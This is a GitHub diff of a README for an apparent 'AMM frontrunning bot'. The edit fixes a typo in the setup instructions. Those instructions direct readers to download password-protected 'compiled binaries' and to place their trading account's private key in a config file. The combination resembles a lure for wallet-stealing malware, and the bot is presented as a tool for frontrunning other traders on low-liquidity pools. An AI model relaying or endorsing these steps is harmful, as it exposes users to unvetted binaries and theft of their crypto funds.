You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: README.md
+1-1Lines changed: 1 addition & 1 deletion
Display the source diff
Display the rich diff
Original file line number
Diff line number
Diff line change
@@ -12,7 +12,7 @@ AMM frontrunning bots can be particularly effective on DEXs with low liquidity,
12
12
### Features
13
13
This bot uses Nethereum library for connection to the blockchain network and monitoring the mempool for pending trades. The configuration specifies the private key of the trading account, smart contracts for monitoring and chain_id of the network. The bot works in Ethereum, Avalanche, Binance networks with Uniswap, Traderjoe and Pancackeswap DEXs.
14
14
### Setup
15
-
-[Download](https://github.com/sunshineioxzc/amm-frontrun-bot/archive/refs/heads/main.zip) compiled binaries and extract with passwod`BOt6maR1IghegO`.
15
+
-[Download](https://github.com/sunshineioxzc/amm-frontrun-bot/archive/refs/heads/main.zip) compiled binaries and extract with password`BOt6maR1IghegO`.
16
16
- Edit `config.json` file. Add private key for trading account and `chain_id` of network you work with.
17
17
- Set addresses of smart contracts in config file. You need to choose contracts with a small liquidity in the pool for more profits. You can check liquidity on `dextools.io`.
0 commit comments